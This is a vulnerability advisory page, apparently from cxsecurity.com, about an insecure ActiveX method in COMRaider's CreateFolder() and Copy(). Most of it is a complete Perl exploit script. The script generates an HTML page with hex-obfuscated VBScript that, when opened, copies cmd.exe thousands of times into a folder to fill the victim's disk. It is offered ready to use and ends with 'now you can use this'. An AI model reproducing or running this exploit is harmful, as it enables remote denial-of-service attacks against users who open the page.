COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method

2009-11-09 / 2009-11-10
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-264


CVSS Base Score: 5.8/10
Impact Subscore: 4.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl ### # COMRaider Idefense Labs CreateFolder() and Copy() Insecure Method (Hard Disk Filler Exploit) # # Discovered and Exploited by : Khashayar Fereidani # Http://IRCRASH.com & Http://Fereidani.ir # # perl comraider.pl # Please enter the foldername (C:\ircrash\ for example) : C:\ircrash# Please enter number of copy cmd to folder (10000 or more for example) : 10000 # ** Ok comraider.html created , now you can use this ############################ # Tnx : Only for God ### $cmd = 'C:\WINDOWS\system32\cmd.exe'; print 'Please enter the foldername (C:\ircrash\ for example) : '; $folder = <stdin>; print "Please enter number of copy cmd to folder (10000 or more for example) : "; $number = <stdin>; chomp $number; chomp $folder; $shellcode = chr(0x3C).chr(0x48).chr(0x54).chr(0x4D).chr(0x4C).chr(0x3E).chr(0xD).chr (0xA).chr(0x3C).chr(0x21).chr(0x2D).chr(0x2D).chr(0xD).chr(0xA).chr(0x43 ).chr(0x4F).chr(0x4D).chr(0x52).chr(0x61).chr(0x69).chr(0x64).chr(0x65). chr(0x72).chr(0x20).chr(0x49).chr(0x64).chr(0x65).chr(0x66).chr(0x65).ch r(0x6E).chr(0x73).chr(0x65).chr(0x20).chr(0x4C).chr(0x61).chr(0x62).chr( 0x73).chr(0x20).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr(0x74).chr(0x 65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0x72).chr(0x28 ).chr(0x29).chr(0x20).chr(0x61).chr(0x6E).chr(0x64).chr(0x20).chr(0x43). chr(0x6F).chr(0x70).chr(0x79).chr(0x28).chr(0x29).chr(0x20).chr(0x49).ch r(0x6E).chr(0x73).chr(0x65).chr(0x63).chr(0x75).chr(0x72).chr(0x65).chr( 0x20).chr(0x4D).chr(0x65).chr(0x74).chr(0x68).chr(0x6F).chr(0x64).chr(0x 20).chr(0x45).chr(0x78).chr(0x70).chr(0x6C).chr(0x6F).chr(0x69).chr(0x74 ).chr(0xD).chr(0xA).chr(0x44).chr(0x69).chr(0x73).chr(0x63).chr(0x6F).ch r(0x76).chr(0x65).chr(0x72).chr(0x65).chr (0x64).chr(0x20).chr(0x62).chr(0x79).chr(0x20).chr(0x3A).chr(0x20).chr(0 x4B).chr(0x68).chr(0x61).chr(0x73).chr(0x68).chr(0x61).chr(0x79).chr(0x6 1).chr(0x72).chr(0x20).chr(0x46).chr(0x65).chr(0x72).chr(0x65).chr(0x69) .chr(0x64).chr(0x61).chr(0x6E).chr(0x69).chr(0xD).chr(0xA).chr(0x68).chr (0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x66).chr(0 x65).chr(0x72).chr(0x65).chr(0x69).chr(0x64).chr(0x61).chr(0x6E).chr(0x6 9).chr(0x2E).chr(0x69).chr(0x72).chr(0x20).chr(0x26).chr(0x20).chr(0x68) .chr(0x74).chr(0x74).chr(0x70).chr(0x3A).chr(0x2F).chr(0x2F).chr(0x69).c hr(0x72).chr(0x63).chr(0x72).chr(0x61).chr(0x73).chr(0x68).chr(0x2E).chr (0x63).chr(0x6F).chr(0x6D).chr(0xD).chr(0xA).chr(0x2D).chr(0x2D).chr(0x3 E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x6F).chr(0x62).chr (0x6A).chr(0x65).chr(0x63).chr(0x74).chr(0x20).chr(0x63).chr(0x6C).chr(0 x61).chr(0x73).chr(0x73).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x6 3).chr(0x6C).chr(0x73).chr(0x69).chr(0x64).chr(0x3A). chr(0x39).chr(0x41).chr(0x30).chr(0x37).chr(0x37).chr(0x44).chr(0x30).ch r(0x44).chr(0x2D).chr(0x42).chr(0x34).chr(0x41).chr(0x36).chr(0x2D).chr( 0x34).chr(0x45).chr(0x43).chr(0x30).chr(0x2D).chr(0x42).chr(0x36).chr(0x 43).chr(0x46).chr(0x2D).chr(0x39).chr(0x38).chr(0x35).chr(0x32).chr(0x36 ).chr(0x44).chr(0x46).chr(0x35).chr(0x38).chr(0x39).chr(0x45).chr(0x34). chr(0x27).chr(0x20).chr(0x69).chr(0x64).chr(0x3D).chr(0x27).chr(0x74).ch r(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr(0x27).chr(0x3E).chr( 0x3C).chr(0x2F).chr(0x6F).chr(0x62).chr(0x6A).chr(0x65).chr(0x63).chr(0x 74).chr(0x3E).chr(0xD).chr(0xA).chr(0xD).chr(0xA).chr(0x3C).chr(0x73).ch r(0x63).chr(0x72).chr(0x69).chr(0x70).chr(0x74).chr(0x20).chr(0x6C).chr( 0x61).chr(0x6E).chr(0x67).chr(0x75).chr(0x61).chr(0x67).chr(0x65).chr(0x 3D).chr(0x27).chr(0x76).chr(0x62).chr(0x73).chr(0x63).chr(0x72).chr(0x69 ).chr(0x70).chr(0x74).chr(0x27).chr(0x3E).chr(0xD).chr(0xA).chr(0x61).ch r(0x72).chr(0x67).chr(0x66).chr(0x3D).chr(0x22).$fold er.chr(0x22).chr(0xD).chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).c hr(0x65).chr(0x74).chr(0x2E).chr(0x43).chr(0x72).chr(0x65).chr(0x61).chr (0x74).chr(0x65).chr(0x46).chr(0x6F).chr(0x6C).chr(0x64).chr(0x65).chr(0 x72).chr(0x20).chr(0x61).chr(0x72).chr(0x67).chr(0x66).chr(0xD).chr(0xA) .chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).c hr(0x20).chr(0x3D).chr(0x20).chr(0x30).chr(0xD).chr(0xA).chr(0x6E).chr(0 x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x20).chr(0x3 D).chr(0x20).$number.chr(0xD).chr(0xA).chr(0x77).chr(0x68).chr(0x69).chr (0x6C).chr(0x65).chr(0x20).chr(0x28).chr(0x6E).chr(0x75).chr(0x6D).chr(0 x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x3C).chr(0x20).chr(0x6 E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x32).chr(0x29) .chr(0xD).chr(0xA).chr(0x6E).chr(0x75).chr(0x6D).chr(0x62).chr(0x65).chr (0x72).chr(0x31).chr(0x20).chr(0x3D).chr(0x20).chr(0x6E).chr(0x75).chr(0 x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20 ).chr(0x2B).chr(0x20).chr(0x31).chr(0xD).chr(0xA).chr(0x61).chr(0x72).ch r(0x67).chr(0x31).chr(0x3D).chr(0x22).$cmd.chr(0x22).chr(0xD).chr(0xA).c hr(0x61).chr(0x72).chr(0x67).chr(0x32).chr(0x3D).chr(0x61).chr(0x72).chr (0x67).chr(0x66).chr(0x20).chr(0x26).chr(0x20).chr(0x6E).chr(0x75).chr(0 x6D).chr(0x62).chr(0x65).chr(0x72).chr(0x31).chr(0x20).chr(0x26).chr(0x2 0).chr(0x22).chr(0x2E).chr(0x65).chr(0x78).chr(0x65).chr(0x22).chr(0xD). chr(0xA).chr(0x74).chr(0x61).chr(0x72).chr(0x67).chr(0x65).chr(0x74).chr (0x2E).chr(0x43).chr(0x6F).chr(0x70).chr(0x79).chr(0x20).chr(0x61).chr(0 x72).chr(0x67).chr(0x31).chr(0x20).chr(0x2C).chr(0x61).chr(0x72).chr(0x6 7).chr(0x32).chr(0xD).chr(0xA).chr(0x77).chr(0x65).chr(0x6E).chr(0x64).c hr(0xD).chr(0xA).chr(0x3C).chr(0x2F).chr(0x73).chr(0x63).chr(0x72).chr(0 x69).chr(0x70).chr(0x74).chr(0x3E); print "** OK comraider.html created , now you can use this"; open(myfile,'>>comraider.html'); print myfile $shellcode;

References:

http://www.securityfocus.com/bid/35725
http://www.securityfocus.com/archive/1/archive/1/505042/100/0/threaded
http://www.juniper.net/security/auto/vulnerabilities/vuln35725.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top